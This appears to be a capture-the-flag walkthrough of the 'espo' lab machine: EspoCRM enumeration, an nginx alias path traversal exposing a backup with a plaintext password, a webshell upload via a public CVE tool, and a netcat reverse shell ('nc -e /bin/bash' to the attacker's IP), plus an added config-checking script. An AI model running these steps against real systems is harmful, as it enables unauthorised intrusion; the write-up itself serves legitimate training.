espo
Information gathering
Port scanning
nmap -sCV -p 1-65535 172.20.10.4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_ 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp open http nginx
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: EspoCRM
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory brute-forcing
feroxbuster -u http://172.20.10.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://172.20.10.4
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 11w 146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 9w 146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 44l 175w 11006c http://172.20.10.4/client/img/favicon196x196.png
301 GET 7l 11w 162c http://172.20.10.4/admin => http://172.20.10.4/admin/
200 GET 177l 28922w 899383c http://172.20.10.4/client/lib/espo.min.js
200 GET 3l 10w 1644c http://172.20.10.4/client/img/favicon.ico
301 GET 7l 11w 162c http://172.20.10.4/portal => http://172.20.10.4/portal/
200 GET 177l 1027w 81578c http://172.20.10.4/client/fonts/open-sans/open-sans-v16-cyrillic_latin_cyrillic-ext_latin-ext-600.woff2
301 GET 7l 11w 162c http://172.20.10.4/install => http://172.20.10.4/install/
200 GET 146l 958w 78346c http://172.20.10.4/client/fonts/open-sans/open-sans-v16-cyrillic_latin_cyrillic-ext_latin-ext-regular.woff2
301 GET 7l 11w 162c http://172.20.10.4/client => http://172.20.10.4/client/
200 GET 27l 6288w 407563c http://172.20.10.4/client/css/espo/espo.css
200 GET 47l 124w 2480c http://172.20.10.4/
301 GET 7l 11w 162c http://172.20.10.4/api => http://172.20.10.4/api/
301 GET 7l 11w 162c http://172.20.10.4/client/modules => http://172.20.10.4/client/modules/
404 GET 1l 7w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 11w 162c http://172.20.10.4/client/img => http://172.20.10.4/client/img/
301 GET 7l 11w 162c http://172.20.10.4/install/css => http://172.20.10.4/install/css/
301 GET 7l 11w 162c http://172.20.10.4/install/js => http://172.20.10.4/install/js/
301 GET 7l 11w 162c http://172.20.10.4/client/css => http://172.20.10.4/client/css/
301 GET 7l 11w 162c http://172.20.10.4/api/v1 => http://172.20.10.4/api/v1/
301 GET 7l 11w 162c http://172.20.10.4/client/modules/crm => http://172.20.10.4/client/modules/crm/
301 GET 7l 11w 162c http://172.20.10.4/client/lib => http://172.20.10.4/client/lib/
301 GET 7l 11w 162c http://172.20.10.4/install/img => http://172.20.10.4/install/img/
301 GET 7l 11w 162c http://172.20.10.4/client/src => http://172.20.10.4/client/src/
301 GET 7l 11w 162c http://172.20.10.4/client/custom => http://172.20.10.4/client/custom/
301 GET 7l 11w 162c http://172.20.10.4/client/custom/modules => http://172.20.10.4/client/custom/modules/
401 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 11w 162c http://172.20.10.4/client/src/collections => http://172.20.10.4/client/src/collections/
301 GET 7l 11w 162c http://172.20.10.4/client/modules/crm/css => http://172.20.10.4/client/modules/crm/css/
301 GET 7l 11w 162c http://172.20.10.4/client/src/ui => http://172.20.10.4/client/src/ui/
301 GET 7l 11w 162c http://172.20.10.4/client/modules/crm/lib => http://172.20.10.4/client/modules/crm/lib/
301 GET 7l 11w 162c http://172.20.10.4/client/modules/crm/src => http://172.20.10.4/client/modules/crm/src/
301 GET 7l 11w 162c http://172.20.10.4/client/css/misc => http://172.20.10.4/client/css/misc/
301 GET 7l 11w 162c http://172.20.10.4/client/res => http://172.20.10.4/client/res/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views => http://172.20.10.4/client/src/views/
301 GET 7l 11w 162c http://172.20.10.4/client/src/models => http://172.20.10.4/client/src/models/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates => http://172.20.10.4/client/res/templates/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/user => http://172.20.10.4/client/res/templates/user/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/email => http://172.20.10.4/client/res/templates/email/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/site => http://172.20.10.4/client/res/templates/site/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/user => http://172.20.10.4/client/src/views/user/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/email => http://172.20.10.4/client/src/views/email/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/site => http://172.20.10.4/client/src/views/site/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/admin => http://172.20.10.4/client/src/views/admin/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/portal => http://172.20.10.4/client/src/views/portal/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/admin => http://172.20.10.4/client/res/templates/admin/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/template => http://172.20.10.4/client/src/views/template/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/team => http://172.20.10.4/client/src/views/team/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/event => http://172.20.10.4/client/src/views/event/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/preferences => http://172.20.10.4/client/src/views/preferences/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/export => http://172.20.10.4/client/src/views/export/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/settings => http://172.20.10.4/client/src/views/settings/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/template => http://172.20.10.4/client/res/templates/template/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/event => http://172.20.10.4/client/res/templates/event/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/record => http://172.20.10.4/client/src/views/record/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/note => http://172.20.10.4/client/src/views/note/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/attachment => http://172.20.10.4/client/src/views/attachment/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/preferences => http://172.20.10.4/client/res/templates/preferences/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/export => http://172.20.10.4/client/res/templates/export/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/settings => http://172.20.10.4/client/res/templates/settings/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/record => http://172.20.10.4/client/res/templates/record/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/attachment => http://172.20.10.4/client/res/templates/attachment/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/errors => http://172.20.10.4/client/res/templates/errors/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/stream => http://172.20.10.4/client/res/templates/stream/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/import => http://172.20.10.4/client/res/templates/import/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/role => http://172.20.10.4/client/src/views/role/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/fields => http://172.20.10.4/client/src/views/fields/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/notification => http://172.20.10.4/client/src/views/notification/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/role => http://172.20.10.4/client/res/templates/role/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/fields => http://172.20.10.4/client/res/templates/fields/
404 GET 1l 39w 595c http://172.20.10.4/api/v1/http%3A%2F%2Fblogs
404 GET 1l 39w 595c http://172.20.10.4/api/v1/**http%3A%2F%2Fwww
404 GET 1l 39w 595c http://172.20.10.4/api/v1/http%3A%2F%2Fcommunity
404 GET 1l 39w 595c http://172.20.10.4/api/v1/http%3A%2F%2Fradar
[###################>] - 17m 5485066/5513669 0s found:71 errors:3816615
[####################] - 7m 220546/220546 495/s http://172.20.10.4/
[####################] - 8m 220546/220546 447/s http://172.20.10.4/admin/
[###################>] - 17m 211338/220546 208/s http://172.20.10.4/portal/
[####################] - 7m 220546/220546 493/s http://172.20.10.4/install/
[####################] - 7m 220546/220546 517/s http://172.20.10.4/client/
[####################] - 7m 220546/220546 505/s http://172.20.10.4/api/
[####################] - 8m 220546/220546 470/s http://172.20.10.4/client/modules/
[####################] - 7m 220546/220546 517/s http://172.20.10.4/client/img/
[####################] - 7m 220546/220546 495/s http://172.20.10.4/install/css/
[####################] - 7m 220546/220546 499/s http://172.20.10.4/install/js/
[####################] - 8m 220546/220546 470/s http://172.20.10.4/client/css/
[##################>-] - 17m 200975/220546 198/s http://172.20.10.4/api/v1/
[####################] - 8m 220546/220546 479/s http://172.20.10.4/client/modules/crm/
[####################] - 7m 220546/220546 518/s http://172.20.10.4/client/lib/
[####################] - 8m 220546/220546 482/s http://172.20.10.4/install/img/
[####################] - 8m 220546/220546 449/s http://172.20.10.4/client/src/
[####################] - 8m 220546/220546 462/s http://172.20.10.4/client/custom/
[####################] - 8m 220546/220546 482/s http://172.20.10.4/client/custom/modules/
[####################] - 8m 220546/220546 454/s http://172.20.10.4/client/src/collections/
[####################] - 8m 220546/220546 453/s http://172.20.10.4/client/src/ui/
[####################] - 8m 220546/220546 463/s http://172.20.10.4/client/css/misc/
[####################] - 8m 220546/220546 466/s http://172.20.10.4/client/res/
[####################] - 8m 220546/220546 485/s http://172.20.10.4/client/src/views/
[####################] - 8m 220546/220546 454/s http://172.20.10.4/client/src/models/
[####################] - 7m 220546/220546 490/s http://172.20.10.4/client/res/templates/
Too slow; I kept scanning while working on other things. It hadn't finished, but by then it was of no further use.
Vulnerability discovery
Manual exploration
Checking sensitive directories
http://172.20.10.4/admin/
http://172.20.10.4/portal/
http://172.20.10.4/install -> http://172.20.10.4/
http://172.20.10.4/robots.txt
User-agent: *
Disallow: /
http://172.20.10.4/client/css/espo/espo.css
Tried Ctrl+F:
Nothing obvious found.
Checked the other directories; nothing of interest, one of them was even just a Google font:
Searching for known vulnerabilities in the middleware
Since I didn't do this box right when it came out, I'm not sure whether the author intended this to be tested.
searchsploit nginx 1.22.1
Exploits: No Results
Shellcodes: No Results
A Google search turned up nothing.
Information gathering
No findings means the enumeration wasn't thorough enough... Rescanning:
Several wordlists yielded nothing and something felt wrong. A look at a write-up suggested my VM deployment had gone wrong... Restarting the VM:
Much better; the earlier deployment had evidently failed. Fuzzing again:
ffuf -u http://172.20.10.4/admin../FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
admin [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 2ms]
[Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 3ms]
_oldsite [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 2ms]
:: Progress: [30000/30000] :: Job [1/1] :: 7407 req/sec :: Duration: [0:00:02] :: Errors: 2 ::
This path construction comes from an nginx misconfiguration. Experimenting, we found:
http://172.20.10.4/admin../
http://172.20.10.4/ -> http://172.20.10.4/
http://172.20.10.4/admin../_oldsite/
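The `/admin../` trick works because a prefix `location` without a trailing slash is combined with an `alias` directive: nginx strips the prefix and appends the rest of the request, so `/admin../` becomes `<alias path>../` and escapes the aliased directory. As an added example (my code, not from the write-up and not the box's real nginx configuration), here is a small config check that flags that pattern; the nginx.conf it scans is constructed for illustration and the location names in it are assumptions:

```sh
#!/bin/sh
# Added example, not from the original write-up: detect the nginx "off-by-slash"
# alias misconfiguration. The weak pattern is a prefix `location` without a trailing
# slash whose block uses `alias`. The config below is constructed for illustration.

make_sample_conf() {
  # Write a constructed nginx config to a temp file and print its path.
  f=$(mktemp)
  cat > "$f" <<'EOF'
server {
    listen 80;
    root /var/www/html/public;

    # weak: no trailing slash on the location, alias inside the block
    location /admin {
        alias /var/www/config/admin/;
    }

    # corrected: trailing slash on both sides, so /admin2../ never matches here
    location /admin2/ {
        alias /var/www/config/admin2/;
    }

    # not affected: root-based location, no alias
    location /client {
        root /var/www/html;
    }
}
EOF
  printf '%s\n' "$f"
}

check_alias_traversal() {
  # Print each location prefix that lacks a trailing slash and uses `alias`.
  # Always exits 0 so the output can be captured under `set -e`.
  awk '
    /^[[:space:]]*location[[:space:]]/ {
      prefix = $2
      # exact-match and regex locations are not prefix matches; skip their blocks
      if (prefix == "=" || prefix == "~" || prefix == "~*") { inloc = 0; next }
      if (prefix == "^~") prefix = $3
      inloc = 1; hasalias = 0
      next
    }
    inloc && /^[[:space:]]*alias[[:space:]]/ { hasalias = 1 }
    inloc && /}/ {
      if (hasalias && prefix !~ "/$") print prefix
      inloc = 0
    }
  ' "$1"
}

# usage: list offending prefixes for the constructed config
conf=$(make_sample_conf)
check_alias_traversal "$conf"
rm -f "$conf"
```

The fix is to give the location the same trailing slash as the alias path (`location /admin/ { alias /var/www/config/admin/; }`) or to serve the directory with `root` instead of `alias`. The function only handles one location block per level, which is enough for a deployment check on flat server blocks like this one.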
ffuf -u http://172.20.10.4/admin../_oldsite/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
info [Status: 200, Size: 540, Words: 72, Lines: 12, Duration: 104ms]
Requesting http://172.20.10.4/admin../_oldsite/info downloads a file with the following content:
# Backup Configuration Settings
# This configuration file dictates the backup protocols for critical data storage.
# Directory for storing backup files
# All backup files are stored in compressed ZIP format for efficient space usage and security.
# Ensure that backups are regularly updated and verified for data integrity.
backup_directory: /admin/_oldsite
backup_format: zip
# Note: The backup directory is designated for ZIP file backups only.
# Regular maintenance and checks are required to ensure data consistency and reliability.
There is a backup file; scanning again:
ffuf -u http://172.20.10.4/admin../_oldsite/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -e .zip
backup.zip [Status: 200, Size: 37975754, Words: 0, Lines: 0, Duration: 0ms]
info [Status: 200, Size: 540, Words: 72, Lines: 12, Duration: 1ms]
Analysing the backup file
With that, enumeration finally reaches a milestone. Let's download the file:
wget http://172.20.10.4/admin../_oldsite/backup.zip
Looking at the configuration files:
┌──(kali💀kali)-[~/temp/espo]
└─$ find ./ -name *config 2>/dev/null
./web.config
./public/portal/web.config
./public/api/v1/web.config
./public/api/v1/portal-access/web.config
┌──(kali💀kali)-[~/temp/espo]
└─$ find ./ -name config* 2>/dev/null
./data/config-internal.php
./data/config.php
./install/core/afterInstall/config.php
./install/core/config.php
./install/config.php
./install/vendor/smarty/demo/configs
./application/Espo/Resources/defaults/config.php
./application/Espo/Resources/metadata/app/config.json
./vendor/laminas/laminas-zendframework-bridge/config
./vendor/league/flysystem/config.subsplit-publish.json
./vendor/tecnickcom/tcpdf/config
./vendor/tecnickcom/tcpdf/examples/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/fi/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/sv/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/fr/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/nl/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/en/uk/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/no/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/pl/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/bg/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/pt/br/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/pt/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/cs/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/hu/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/ru/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/da/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/de/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/it/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/tr/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/es/config
Looking through these configuration files, ./data/config.php contains credentials:
.......
'smtpUsername' => 'admin',
'smtpPassword' => '39Ue4kcVJ#YpaAV24CNmbWU',
.......
Trying to log in:
Looking up vulnerabilities
Since it's a 2022 version, I searched for related vulnerabilities:
Not what we want; let's check its version:
Googling for related vulnerabilities:
Judging by the machine's creation date, it is probably one of the last two:
Searching for an available payload:
Found a verification tool: https://github.com//cve-2023-5966
Let's see whether it works:
It then prompts to install; just install it. On success the following screen appears:
Taking a look at webshell.php:
Spawning a reverse shell:
nc -e /bin/bash 172.20.10.8 1234
Privilege escalation
Information gathering
(remote) www-data@espo:/var/www/html/public$ ls -la
total 36
drwxr-xr-x 5 www-data www-data 4096 Apr 4 08:20 .
drwxr-xr-x 12 www-data www-data 4096 Dec 4 15:42 ..
drwxr-xr-x 3 www-data www-data 4096 Dec 4 15:42 api
-rw-r--r-- 1 www-data www-data 1689 Dec 4 15:42 index.php
drwxr-xr-x 5 www-data www-data 4096 Dec 4 15:42 install
-rw-r--r-- 1 www-data www-data 1660 Dec 4 15:42 oauth-callback.php
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 portal
-rw-r--r-- 1 www-data www-data 26 Dec 4 15:42 robots.txt
-rw-r--r-- 1 www-data www-data 302 Apr 4 08:20 webshell.php
(remote) www-data@espo:/var/www/html/public$ cd ..
(remote) www-data@espo:/var/www/html$ ls -la
total 136
drwxr-xr-x 12 www-data www-data 4096 Dec 4 15:42 .
drwxr-xr-x 4 root root 4096 Dec 4 15:42 ..
-rw-r--r-- 1 www-data www-data 1153 Dec 4 15:42 .htaccess
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 EspoCRM-7.2.4
-rw-r--r-- 1 www-data www-data 35819 Dec 4 15:42 LICENSE.txt
drwxr-xr-x 3 www-data www-data 4096 Dec 4 15:42 application
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 bin
-rw-r--r-- 1 www-data www-data 1498 Dec 4 15:42 bootstrap.php
-rw-r--r-- 1 www-data www-data 1543 Dec 4 15:42 clear_cache.php
drwxr-xr-x 12 www-data www-data 4096 Dec 4 15:42 client
-rw-r--r-- 1 www-data www-data 1536 Dec 4 15:42 command.php
-rw-r--r-- 1 www-data www-data 1531 Dec 4 15:42 cron.php
drwxrwxr-x 3 www-data www-data 4096 Dec 4 15:42 custom
-rw-r--r-- 1 www-data www-data 1535 Dec 4 15:42 daemon.php
drwxrwxr-x 7 www-data www-data 4096 Apr 4 08:20 data
-rw-r--r-- 1 www-data www-data 2812 Dec 4 15:42 extension.php
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 html
-rw-r--r-- 1 www-data www-data 3170 Dec 4 15:42 index.php
drwxr-xr-x 4 www-data www-data 4096 Dec 4 15:42 install
-rw-r--r-- 1 www-data www-data 1537 Dec 4 15:42 preload.php
drwxr-xr-x 5 www-data www-data 4096 Apr 4 08:20 public
-rw-r--r-- 1 www-data www-data 1537 Dec 4 15:42 rebuild.php
-rw-r--r-- 1 www-data www-data 3034 Dec 4 15:42 upgrade.php
drwxr-xr-x 39 www-data www-data 4096 Dec 4 15:42 vendor
-rw-r--r-- 1 www-data www-data 2534 Dec 4 15:42 web.config
-rw-r--r-- 1 www-data www-data 1541 Dec 4 15:42 websocket.php
(remote) www-data@espo:/var/www/html$ cd ..
(remote) www-data@espo:/var/www$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Dec 4 15:42 .
drwxr-xr-x 13 root root 4096 Dec 7 19:46 ..
drwxr-xr-x 4 www-data www-data 4096 Dec 4 15:42 config
drwxr-xr-x 12 www-data www-data 4096 Dec 4 15:42 html
(remote) www-data@espo:/var/www$ cd config/
(remote) www-data@espo:/var/www/config$ ls -la
total 16
drwxr-xr-x 4 www-data www-data 4096 Dec 4 15:42 .
drwxr-xr-x 4 root root 4096 Dec 4 15:42 ..
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 _oldsite
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 admin
(remote) www-data@espo:/var/www/config$ cd ../../
(remote) www-data@espo:/var$ ls -la
total 52
drwxr-xr-x 13 root root 4096 Dec 7 19:46 .
drwxr-xr-x 18 root root 4096 Dec 4 07:02 ..
drwxr-xr-x 2 root root 4096 Apr 4 07:44 backups
drwxr-xr-x 11 root root 4096 Jan 26 19:42 cache
drwxr-xr-x 38 root root 4096 Dec 6 19:22 lib
drwxrwsr-x 2 root staff 4096 Mar 2 2023 local
lrwxrwxrwx 1 root root 9 Jun 15 2023 lock -> /run/lock
drwxr-xr-x 9 root root 4096 Apr 4 06:45 log
drwxrwsr-x 2 root mail 4096 Jan 24 20:01 mail
drwxr-xr-x 2 root root 4096 Jun 15 2023 opt
lrwxrwxrwx 1 root root 4 Jun 15 2023 run -> /run
drwxrwxrwt 2 root root 4096 Jan 24 19:57 shared_medias
drwxr-xr-x 7 root root 4096 Dec 6 19:22 spool
drwxrwxrwt 5 root root 4096 Apr 4 08:09 tmp
drwxr-xr-x 4 root root 4096 Dec 4 15:42 www
(remote) www-data@espo:/var$ mail
"/var/mail/www-data": 1 message 1 new
>N 1 Mail Delivery Syst Wed Jan 24 20:01 71/2178 Undelivered Mail Returned to Sender
?
X-Original-To: www-data@nc-ass-vip.sdv.fr
Date: Wed, 24 Jan 2024 20:01:19 +0100 (CET)
From: Mail Delivery System <MAILER-DAEMON@espo.hmv>
Subject: Undelivered Mail Returned to Sender
To: www-data@nc-ass-vip.sdv.fr
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="B282E871.1706122879/espo.hmv"
Content-Transfer-Encoding: 8bit
This is a MIME-encapsulated message.
--B282E871.1706122879/espo.hmv
Content-Description: Notification
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit
This is the mail system at host espo.hmv.
I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.
For further assistance, please send mail to postmaster.
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The mail system
<mandie@espo.hmv> (expanded from <mandie>): Command time limit exceeded:
"/dev/shm/pwn"
--B282E871.1706122879/espo.hmv
Content-Description: Delivery report
Content-Type: message/delivery-status
Reporting-MTA: dns; espo.hmv
X-Postfix-Queue-ID: B282E871
X-Postfix-Sender: rfc822; www-data@nc-ass-vip.sdv.fr
Arrival-Date: Wed, 24 Jan 2024 19:44:39 +0100 (CET)
Final-Recipient: rfc822; mandie@espo.hmv
Original-Recipient: rfc822;mandie@espo.hmv
Action: failed
Status: 5.3.0
Diagnostic-Code: x-unix; internal software error
--B282E871.1706122879/espo.hmv
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit
Return-Path: <www-data@nc-ass-vip.sdv.fr>
Received: by espo.hmv (Postfix, from userid 33)
id B282E871; Wed, 24 Jan 2024 19:44:39 +0100 (CET)
Subject: lol
To: mandie@espo.hmv
User-Agent: mail (GNU Mailutils 3.15)
Date: Wed, 24 Jan 2024 19:44:39 +0100
Message-Id: <20240124184439.B282E871@espo.hmv>
From: www-data <www-data@nc-ass-vip.sdv.fr>
pwned
--B282E871.1706122879/espo.hmv--
Was this a phishing attempt? Continuing to enumerate:
(remote) www-data@espo:/$ crontab -l
no crontab for www-data
(remote) www-data@espo:/$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
cat: /etc/cron.yearly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
(remote) www-data@espo:/$ cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
Debian-exim:x:104:112::/var/spool/exim4:/usr/sbin/nologin
faxmaster:x:105:113:HylaFAX administrative mailbox,,,:/var/spool/hylafax:/usr/sbin/nologin
avahi:x:106:114:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
geoclue:x:107:115::/var/lib/geoclue:/usr/sbin/nologin
mysql:x:108:116:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:117::/var/spool/postfix:/usr/sbin/nologin
mandie:x:1000:1000:,,,:/home/mandie:/bin/zsh
(remote) www-data@espo:/$ cd /etc
(remote) www-data@espo:/etc$ ls
ImageMagick-6 console-setup ethertypes initramfs-tools magic.mime pam.d resolvconf sudoers.d
ModemManager cron.d exim4 inputrc mail.rc papersize rmt sv
NetworkManager cron.daily fonts insserv.conf.d mailcap passwd rpc sysctl.conf
X11 cron.hourly fstab iproute2 mailcap.order passwd- rsyslog.d sysctl.d
adduser.conf cron.monthly gai.conf issue mailname perl runit systemd
adjtime cron.weekly geoclue issue.net manpath.config php security terminfo
aliases cron.yearly ghostscript kernel mime.types polkit-1 selinux timezone
aliases.db crontab groff kernel-img.conf mke2fs.conf postfix sensors.d tmpfiles.d
alternatives dbus-1 group ld.so.cache modprobe.d ppp sensors3.conf ucf.conf
anacrontab debconf.conf group- ld.so.conf modules profile services udev
apache2 debian_version grub.d ld.so.conf.d modules-load.d profile.d sgml ufw
apparmor default gshadow ldap motd protocols shadow update-motd.d
apparmor.d deluser.conf gshadow- libaudit.conf mtab python3 shadow- usb_modeswitch.conf
apt dhcp gss libnl-3 mysql python3.11 shells usb_modeswitch.d
avahi dictionaries-common gssapi_mech.conf libpaper.d nanorc rc0.d skel vim
bash.bashrc discover-modprobe.conf gtk-3.0 locale.alias netconfig rc1.d ssh wgetrc
bash_completion discover.conf.d host.conf locale.gen network rc2.d ssl wpa_supplicant
bash_completion.d dpkg hostname localtime networks rc3.d subgid xattr.conf
bindresvport.blacklist e2scrub.conf hosts logcheck nftables.conf rc4.d subgid- xdg
binfmt.d emacs hosts.allow login.defs nginx rc5.d subuid xml
bluetooth email-addresses hosts.deny logrotate.conf nsswitch.conf rc6.d subuid- zsh
ca-certificates enscript.cfg hylafax logrotate.d opt rcS.d sudo.conf
ca-certificates.conf environment ifplugd machine-id os-release reportbug.conf sudo_logsrvd.conf
chatscripts environment.d init.d magic pam.conf resolv.conf sudoers
(remote) www-data@espo:/etc$ cd /opt
(remote) www-data@espo:/opt$ ls
